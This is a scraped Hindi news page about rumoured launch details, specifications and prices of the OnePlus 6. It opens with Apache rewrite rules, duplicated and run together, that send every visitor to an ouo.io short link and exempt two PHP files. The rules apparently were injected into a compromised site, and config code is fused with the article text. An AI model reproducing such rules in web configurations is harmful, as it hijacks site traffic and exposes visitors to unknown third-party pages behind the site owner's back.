
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 399
Nextनई दिल्ली। वनप्लस के फ्लैगशिप स्मार्टफोन OnePlus 6 का इंतज़ार जल्द खत्म होने वाला है। वनप्लस अपने इस नए फोन को मई के पहले हफ्ते में लॉन्च कर सकती है। इस फोन को लेकर लंबे समय से अफवाहों का बाज़ार गरम था, अब कंपनी ने इस बात पर मुहर लगा दी है कि वह फोन को पेश करने के लिए तैयार है। कंपनी ने ट्वीटर पर 4 सेकेंड का एक वीडियो जारी किया गया है। इस वीडियो के साथ कैप्शन लिखा है 6th Ready। साथ ही वीडियो में Speed का जिक्र भी है। इससे पहले इस बात की पुष्टि हो चुकी है कि आने वाला फोन लेटेस्ट क्वालकॉम प्रोसेसर, स्नैपड्रैगन 845 से लैस होगा। इससे पहले अफवाहें आ रही थी कि फोन को 6 मार्च को लॉन्च किया जाएगा।
रिपोर्ट्स के मुताबिक फोन में 8 जीबी की रैम और 256 जीबी की इंटरनल स्टोरेज हो सकती है। इससे पहले कंपनी के CEO Pete Lau ने कंफर्म किया था कि वनप्लस 6 पर आईफोन X नॉच जैसा डिस्प्ले दिया जाएगा। साथ ही हाल ही में टिप्सटर Evan Blass की लीक की गई फोटो में कंफर्म किया गया है कि फोन के पीछे ठीक फिंगरप्रिंट सेंसर के उपर वर्टकिल डुअल कैमरा सेटअप होगा।
रिपोर्ट के मुताबिक, वनप्लस 6 के 64 जीबी वेरिएंट की कीमत 3,299 चीनी युआन (करीब 34,200 रुपये) होगी, जबकि 128 जीबी वेरिएंट को 3,799 चीनी युआन (करीब 39,300 रुपये) में लॉन्च किया जाएगा। वहीं 256 जीबी स्टोरेज वाले टॉप-ऐंड मॉडल को 4,399 चीनी युआन (करीब 45,600 रुपये) में लॉन्च किए जाने की उम्मीद है। इसके अलावा टिप्सटर Ronald Quant ने फोन को Wifi सर्टिफिकेशन वेबसाइट पर स्पॉट किया। लिस्टिंग से पता चलता है कि फोन, Android 8.1 Oreo out-of-the-box, डुअल-बैंड वाई-फाई 802.11ac और लेटेस्ट क्वालकॉम WCN3990 Wifi modem के साथ आएगा।